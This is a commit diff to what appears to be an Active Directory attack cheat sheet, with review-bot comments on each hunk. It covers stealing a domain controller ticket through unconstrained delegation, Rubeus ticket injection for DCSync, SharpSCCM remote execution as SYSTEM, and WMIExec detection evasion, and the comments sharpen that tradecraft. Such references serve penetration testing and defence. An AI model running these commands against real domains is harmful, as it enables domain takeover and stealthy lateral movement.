WMIExec + SharpSCCM

Swissky 2023-02-15 12:33:20 +01:00
parent 36e135776f
commit ae46ac0338
2 changed files with 22 additions and 2 deletions

@ -3422,6 +3422,9 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma
:warning: Unconstrained delegation used to be the only option available in Windows 2000
> **Warning**
> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket
#### SpoolService Abuse with Unconstrained Delegation
The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
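Review bot: the new `> **Warning**` blockquote introduces a second callout style one line away from the `:warning:` emoji convention this section already uses (`:warning: Unconstrained delegation used to be the only option ...`, and `:warning: : Domain controllers usually have ...` further down), so the two warnings render differently; pick one form for both. The tip is also stated as a bare rule, and this is exactly the point people get wrong, so add the reason: coercing to an IP address makes the victim fall back to NTLM, while a hostname lets it request a Kerberos service ticket for the unconstrained-delegation host, which is what puts the TGT in that host's memory.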
@ -3436,7 +3439,7 @@ The goal is to gain DC Sync privileges using a computer account and the SpoolSer
##### Find delegation
:warning: : Domain controllers usually have unconstrained delegation enabled.
Check the `TrustedForDelegation` property.
Check the `TRUSTED_FOR_DELEGATION` property.
* [ADModule](https://github.com/samratashok/ADModule)
```powershell
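Review bot: replacing `TrustedForDelegation` with `TRUSTED_FOR_DELEGATION` swaps the name of the `Get-ADComputer` property for the name of the `userAccountControl` bit, and the ADModule example that follows this line still works with the property form, so the sentence now disagrees with its own example. Both names are legitimate but belong to different layers; state both, e.g. "Check the `TrustedForDelegation` property (the `TRUSTED_FOR_DELEGATION` bit, `0x80000`, of `userAccountControl`)". That also explains the literal `524288` in the LDAP filter added further down in this commit.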
@ -3455,6 +3458,9 @@ Check the `TrustedForDelegation` property.
cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
```
* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`
* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl`
##### SpoolService status
Check if the spool service is running on the remote host
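Review bot: the new `Get-ADComputer` bullet is a second entry for the same module as the `ADModule` bullet above it (samratashok's ADModule is Microsoft's ActiveDirectory module packaged so it can be imported without RSAT), so the LDAP filter would fit better folded into that bullet than as a separate tool. The filter itself is correct: OID `1.2.840.113556.1.4.803` is the bitwise-AND matching rule and `524288` is `0x80000`, `TRUSTED_FOR_DELEGATION`. Since the line just above says domain controllers usually have the flag set, adding `(!(primaryGroupID=516))` to the filter would drop the DCs and leave only the member servers that are actually worth targeting.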
@ -3499,7 +3505,7 @@ If the attack worked you should get a TGT of the domain controller.
Extract the base64 TGT from Rubeus output and load it to our current session.
```powershell
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
.\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt
```
Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
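Review bot: adding `/service:` fixes a real gap, since `Rubeus asktgs` needs a target SPN and the old line would have failed, but the sentence above the block (`Extract the base64 TGT from Rubeus output and load it to our current session`) still describes the old intent. With `asktgs` the TGT is used to request service tickets for `LDAP/dc.lab.local` and `cifs/dc.lab.local`, and `/ptt` injects those TGS, not the TGT; if the goal is only to import the TGT, the command is `Rubeus.exe ptt /ticket:<ticket base64>`. Either update the sentence to say the TGT is used to request LDAP/CIFS tickets for the DCSync step, or keep the plain `ptt` form. Also write the host as a placeholder such as `<dc_fqdn>` to match `<ticket base64>` on the same line, since `dc.lab.local` reads like a real value.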
@ -3768,6 +3774,13 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* Using **SharpSCCM**
```ps1
.\SharpSCCM.exe get device --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
```
* Compromise client, use locate to find management server
```ps1
MalSCCM.exe locate
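Review bot: `<SERVER8NAME>` on the first SharpSCCM line is a typo for `<SERVER_NAME>`. The three lines also mix two command-line styles: the first uses `--server`/`--site-code` options, the second passes `<server> <sitecode>` positionally before `exec`, and the third passes neither, so the block will not work as copied against any single SharpSCCM version; pick the syntax of the version being documented and use it on all three lines. `-r <relay_server_ip>` on the second line is the only option in the block that is not self-explanatory; a short comment that it coerces the target client to authenticate to the relay host, as opposed to `-p`, which runs a command (here as SYSTEM via `-s`), would make the difference between the two `exec` lines clear.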
@ -3838,6 +3851,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
ConvertFrom-SddlString ""
```
### SCCM Shares
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
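Review bot: `ConvertFrom-SddlString ""` passes an empty SDDL string, which the cmdlet rejects, so the line reads as an unfinished placeholder; either put the SDDL string to decode inside the quotes or mark it `"<SDDL>"` like the other placeholders in the file. The new `### SCCM Shares` heading and its description line otherwise follow the file's existing heading convention.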

@ -10,6 +10,7 @@
* [Crackmapexec](#crackmapexec)
* [Impacket](#impacket)
* [PSExec](#psexec)
* [WMIExec](#wmiexec)
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Powershell Remoting Protocol](#powershell-remoting-protocol)
@ -162,6 +163,11 @@ Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCu
You need to update the pipe name to match "Custom_communication" in the line 163
`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`
### WMIExec
Use a non default share `-share SHARE` to write the output to reduce the detection.
By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`
## RDP Remote Desktop Protocol
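Review bot: the new section never names the tool: `-share SHARE` is an option of Impacket's `wmiexec.py`, and a reader arriving from the table of contents cannot tell that from `### WMIExec` alone; open with a full invocation such as `wmiexec.py -share C$ domain/user:password@target`. `reduce the detection` should read `reduce detection`, and the point deserves one more sentence, because a non-default share only changes the path: the output file is still written to the share and read back over SMB, so a rule keyed on file writes to `ADMIN$` is avoided while one keyed on the `cmd.exe /Q /c ... 1> \\127.0.0.1\` redirection is not. The command shown as the default is the `cd` that `wmiexec.py` issues to learn the working directory, with `__RANDOM` standing for a timestamp-based filename; say so, since as written it looks like the command for every execution. If the goal is to leave no file on the share at all, `-nooutput` skips the SMB output file entirely at the cost of not seeing results.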